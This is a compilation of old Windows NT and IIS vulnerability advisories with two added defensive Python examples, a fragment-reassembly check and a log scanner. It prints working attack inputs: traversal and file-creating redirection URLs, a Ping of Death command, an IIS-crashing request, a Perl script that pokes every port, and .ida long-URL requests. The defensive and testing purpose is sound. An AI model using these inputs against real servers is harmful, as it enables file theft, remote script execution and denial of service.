Affected systems: NT 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------

Affected systems: NT 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.
----------------------------------------------------------------------

Affected systems: NT 3.51, NT 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple confused services can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than its usual processor time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script, gleaned from postings on the NTsecurity@iss.net list, to test the ports on your own system (Perl is available from the NT Resource Kit):
/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";    # Perl 4 era chat library providing chat::open_port, chat::print, chat::close

$systemname = $ARGV[0] && shift;    # host name to test, taken from the command line

$verbose = 1;       # tell me what you're hitting
$knownports = 1;    # don't hit known problem ports

for ($port = 1; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless defined $fh;    # nothing listening on this port, skip it
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

---------------------------------------------------------------------------------

Affected systems: NT 4.0

Using a telnet application to connect to a webserver via HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: NT 3.51, NT 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0x0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
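An added example (not part of the original list) of the receive-side bound check a fragment reassembler needs to survive the oversized echo request described above: every fragment's end offset is compared against the 65535-byte IPv4 datagram maximum before anything is copied into the reassembly buffer. The fragment tuples, the 1500-byte MTU and the 20-byte option-free header are constructed assumptions; the 65527-byte ping payload is the figure from the text.

```python
"""Bound check for IPv4 fragment reassembly against the oversized ICMP echo
described above. Added example, not from the original advisory; inputs are constructed."""
MAX_IP_DATAGRAM = 65535   # the IPv4 total-length field is 16 bits wide
IP_HEADER = 20            # assumption: minimal IPv4 header with no options
MTU = 1500                # assumption: Ethernet-sized link

def fragment(payload_len: int, mtu: int = MTU) -> list[tuple[int, bool, int]]:
    """Split an IP payload into (offset_in_8_byte_units, more_fragments, length) tuples
    the way a sender would, with no upper bound, to model what a receiver must tolerate."""
    per_frag = (mtu - IP_HEADER) // 8 * 8   # non-final fragments are multiples of 8 bytes
    frags, off = [], 0
    while off < payload_len:
        length = min(per_frag, payload_len - off)
        more = off + length < payload_len
        frags.append((off // 8, more, length))
        off += length
    return frags

def check_reassembly(frags) -> tuple[bool, int]:
    """Return (ok, reassembled_payload_len). Reject, before copying, any fragment that
    would land beyond the largest payload a 65535-byte datagram can carry."""
    limit = MAX_IP_DATAGRAM - IP_HEADER
    end = 0
    for offset_units, more, length in frags:
        start = offset_units * 8
        if start + length > limit:
            return False, start + length     # would overrun a fixed-size reassembly buffer
        if more and length % 8:
            return False, start + length     # non-final fragments must be 8-byte aligned
        end = max(end, start + length)
    return True, end

# Constructed inputs: ping -l 65527 carries 65527 bytes after the 8-byte ICMP header,
# i.e. 65535 bytes of IP payload and a 65555-byte datagram once the IP header is added.
PING_OF_DEATH = fragment(8 + 65527)
NORMAL_PING = fragment(8 + 32)        # a default-sized echo request fits in one fragment

if __name__ == "__main__":
    print("normal:", check_reassembly(NORMAL_PING))
    print("oversized:", check_reassembly(PING_OF_DEATH))
```

The oversized datagram is refused at its final fragment, whose end offset (65535) exceeds the 65515 bytes of payload a maximal datagram can hold; a 65515-byte payload is still accepted.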

--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of result. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively a denial of service against the server). All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be made to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user gets a response that looks like 'The IDQ d:\http\anything.idq could not be found'. Such a response lets him learn more about how the web site is organized and the directory structure of the server.
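An added example (not from the original list) that turns the request shapes described on this page into log-inspection rules: the '..\..' and 'scripts..\..' traversals, the '>' and %0A%0D output redirection, the bare 'GET ../..', and the .ida/.idq path-disclosure and long-URL requests. The '<client> <method> <url>' line format, the sample lines and the 1024-byte "oversized" threshold are constructed assumptions; the text only says roughly 25 KB of dots.

```python
"""Flag the IIS/NT request patterns described above in raw request lines.
Added example, not from the original advisory; the log lines are constructed."""
import re
from urllib.parse import unquote

# Constructed sample log in an assumed "<client> <method> <url>" format.
SAMPLE_LOG = "\n".join([
    "10.0.0.5 GET /index.htm",
    "10.0.0.7 GET /..\\..",
    "10.0.0.7 GET /scripts..\\..\\scriptname",
    "10.0.0.9 GET /scripts/script_name%0A%0D>PATH\\target.bat",
    "10.0.0.9 GET ../..",
    "10.0.0.11 GET /anything.idq",
    "10.0.0.11 GET /" + "." * 3000 + "ida",
])

def classify_url(url: str) -> list[str]:
    """Return the names of the rules a single request URL matches (empty if clean)."""
    decoded = unquote(url)          # %0A%0D becomes a real LF/CR before matching
    hits = []
    # 1. Directory traversal: a '..' segment ending in a back- or forward slash (or the
    #    URL), which covers both '/..\..' and the 'scripts..\..\scriptname' form.
    if re.search(r"\.\.(?=[\\/]|$)", decoded):
        hits.append("traversal")
    # 2. Output redirection: a '>' or an embedded CR/LF in the request, the shape
    #    used above to create or truncate 'target.bat' on the server.
    if ">" in decoded or "\r" in decoded or "\n" in decoded:
        hits.append("redirect-or-crlf")
    # 3. .ida/.idq requests: path disclosure for any name, a crash for very long ones.
    path = decoded.split("?", 1)[0]
    if re.search(r"\.id[aq]$", path, re.IGNORECASE):
        hits.append("idq-ida-probe")
        if len(path) > 1024:        # assumed threshold; the text describes ~25 KB of '.'
            hits.append("oversized-ida")
    return hits

def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Parse '<client> <method> <url>' lines and return only the flagged requests."""
    flagged = []
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue                # malformed line: skip it rather than crash the scan
        client, _method, url = parts
        hits = classify_url(url)
        if hits:
            flagged.append((client, url, hits))
    return flagged

if __name__ == "__main__":
    for client, url, hits in scan_log(SAMPLE_LOG):
        print(f"{client} {', '.join(hits)}: {url[:60]}")
```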